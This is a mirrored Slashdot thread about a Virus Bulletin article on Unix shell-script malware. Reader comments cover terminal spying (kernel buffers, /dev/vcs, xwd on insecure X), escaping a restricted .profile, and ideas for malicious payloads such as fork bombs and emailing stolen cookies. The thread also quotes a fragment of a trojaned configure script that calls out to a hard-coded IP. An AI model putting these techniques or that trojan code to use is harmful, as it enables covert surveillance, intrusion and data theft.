Slashdot Mirror

← Back to Stories (view on slashdot.org)

Unix Shell-Scripting Malware

Posted by timothy on from the one-day-it-will-get-bad dept.

sheriff_p writes: "Virus Bulletin are running an article on Unix shell scripting malware, citing a 'zeitgeist' of interest in *nix malware following the release of {Win32/Linux}/Simile.D. The article looks at possible infection methods, possible actions the virus could take, and at a couple of real-world examples..."

7 of 212 comments (clear)

  1. Some points to note...this is not so new by Real+World+Stuff · · Score: 3, Interesting

    The problem with trying to pipe both input and output to an arbitrary slave process is that deadlock can occur, if both processes are waiting for not-yet-generated input at the same time. Deadlock can be avoided only by having BOTH sides follow a strict deadlock-free protocol, but since that requires cooperation from the processes it is inappropriate for a popen()-like library function.

    The 'expect' distribution includes a library of functions that a C programmer can call directly. One of the functions does the equivalent of a popen for both reading and writing. It uses ptys rather than pipes, and has no deadlock problem. It's portable to both BSD and SV. See the next answer for more about 'expect'.

    There are a few different ways you can do this, although none of them is perfect:
    * kibitz allows two (or more) people to interact with a shell (or any arbitary program). Uses include:
    - watching or aiding another person's terminal session;
    - recording a conversation while retaining the ability to scroll backwards, save the conversation, or even edit it while in progress;
    - teaming up on games, document editing, or other cooperative tasks where each person has strengths and weakness that complement one another. For example:
    1) kibitz comes as part of the expect distribution.
    2) kibitz requires permission from the person to be spyed upon.

    To spy without permission requires less pleasant approaches:
    * You can write a program that grovels through Kernel structures and watches the output buffer for the terminal in question,
    displaying characters as they are output. This, obviously, is not something that should be attempted by anyone who does not
    have experience working with the Unix kernel. Furthermore, whatever method you come up with will probably be quite non-portable.

    * If you want to do this to a particular hard-wired terminal all the time (e.g. if you want operators to be able to check the console terminal of a machine from other machines), you can actually splice a monitor into the cable for the terminal. For example, plug the monitor output into another machine's serial port, and run a program on that port that stores its input somewhere and then transmits it out
    *another* port, this one really going to the physical terminal. If you do this, you have to make sure that any output from the terminal is transmitted back over the wire, although if you splice only into the computer->terminal wires, this isn't much of a problem. This is not something that should be attempted by anyone who is not very familiar with terminal wiring and such.

    --
    If we don't fight for ourselves no one will.
    1. Re:Some points to note...this is not so new by digitalhermit · · Score: 4, Interesting

      To spy without permission requires less pleasant approaches:
      * You can write a program that grovels through Kernel structures and watches the output buffer for the terminal in question, displaying characters as they are output. This, obviously, is not something that should be attempted by anyone who does not
      have experience working with the Unix kernel. Furthermore, whatever method you come up with will probably be quite non-portable.


      Some thoughts on seeing what someone else sees:

      If you can manage to get read permissions on Linux under /dev/vcs* you can also read the virtual consoles directly. This *might* require root access, but not always :).

      screen can be setup with similar functionality to kibitz.

      With insecure X permissions, you can use xwd to dump images from a remote xserver. With a short script you can also grab remote keypresses and events for logging.

    2. Re:Some points to note...this is not so new by Erotomek · · Score: 2, Interesting

      With insecure X permissions, you can use xwd to dump images from a remote xserver. With a short script you can also grab remote keypresses and events for logging.

      It reminds me about OS (Output Spy, not Operating System) from many, many years ago. Here's an OS and JEDGAR story from the Jargon File:

      This story says a lot about the ITS ethos.

      On the ITS system there was a program that allowed you to see what was being printed on someone else's terminal. It spied on the other guy's output by examining the insides of the monitor system. The output spy program was called OS. Throughout the rest of the computer science world (and at IBM too) OS means `operating system', but among old-time ITS hackers it almost always meant `output spy'.

      OS could work because ITS purposely had very little in the way of `protection' that prevented one user from trespassing on another's areas. Fair is fair, however. There was another program that would automatically notify you if anyone started to spy on your output. It worked in exactly the same way, by looking at the insides of the operating system to see if anyone else was looking at the insides that had to do with your output. This `counterspy' program was called JEDGAR (a six-letterism pronounced as two syllables: /jed'gr/), in honor of the former head of the FBI.

      But there's more. JEDGAR would ask the user for `license to kill'. If the user said yes, then JEDGAR would actually gun the job of the luser who was spying. Unfortunately, people found that this made life too violent, especially when tourists learned about it. One of the systems hackers solved the problem by replacing JEDGAR with another program that only pretended to do its job. It took a long time to do this, because every copy of JEDGAR had to be patched. To this day no one knows how many people never figured out that JEDGAR had been defanged.

      Interestingly, there is still a security module named JEDGAR alive as of late 1994 -- in the Unisys MCP for large systems. It is unknown to us whether the name is tribute or independent invention.

      --

      Krótko: kady Erotomek
      W pimiennictwie ma swój domek.

  2. Re:Easy linux virus transport format: by kylus · · Score: 3, Interesting

    You could take a look at the NSA's Security Enhanced Linux patch, which allows for a much finer-grained control over access to files on the system. It's a bit complex but it sounds like the answer to your question.

    --
    --Kylus
    Idiot-proof something, and Life will build a better Idiot.
  3. Re:Not that special... by digitalhermit · · Score: 3, Interesting

    Certainly it's easy to create scripts that can do nasty things. I guess the main difference between some other OS vulnerabilities is that to infect a machine, I may need only send an email. For some other OSes, I would need to send a package, have them su to root, run ./configure and make install. In any case, I'm not convinced that any OS is inherently more secure than any other.
    For example, at the last company I worked for, the access to a database system was done through a .profile that automatically launched the db client. On exit from the client it would automatically log the user out. Apparently they believed that this would disable access to the shell for the user. Unfortunately, it was a simple matter to print an ASCII report and overwrite the .profile, thus allowing the next login to enjoy the benefits of the shell.

  4. Re:Got root? by Stonehand · · Score: 3, Interesting

    For one thing, there are probably numerous boxes with nice broadband -- a virus could use a user account as a launchpad for a DDOS, for instance. In addition, boxes may be lacking patches or workarounds for any recent local exploits, so one might theoretically be able to get root privs without tricking root.

    Depending on what's limited, one might try to fill up /tmp, generate lots of logs and possibly fill /var/adm/syslog or wherever, maybe fill the process table via fork bomb depending on how processes are limited, grab the user's cookies and browser history files for popular browsers and e-mail them to people, consume large amounts of memory (again, unless limited per user) forcing swap...

    --
    Only the dead have seen the end of war.
  5. Re:Not that special... by btellier · · Score: 5, Interesting

    >What about ./configure scripts?

    Actually that seems to be the new trend amongst hax0rs who trojan program distributions. Recently it was reported to bugtraq that monkey.org was compromised and several programs including fragroute and dsniff were altered. Read the explanation of how that happened here.

    What did the hax0rs add? A little present in the ./configure script. Among other things it creates a .c file called conftest with some interetsing "checks" in it:

    ...
    + sa.sin_addr.s_addr = inet_addr("216.80.99.202");
    if(connect(s, (struct sockaddr *)&sa, sizeof(sa)) ...

    It connects to the above address on port 6667 and does some other nonsense. Then it's compiled and run. The user is none the wiser unless he takes the time to read the ENTIRE ./configure script.

    You can find the full diff here.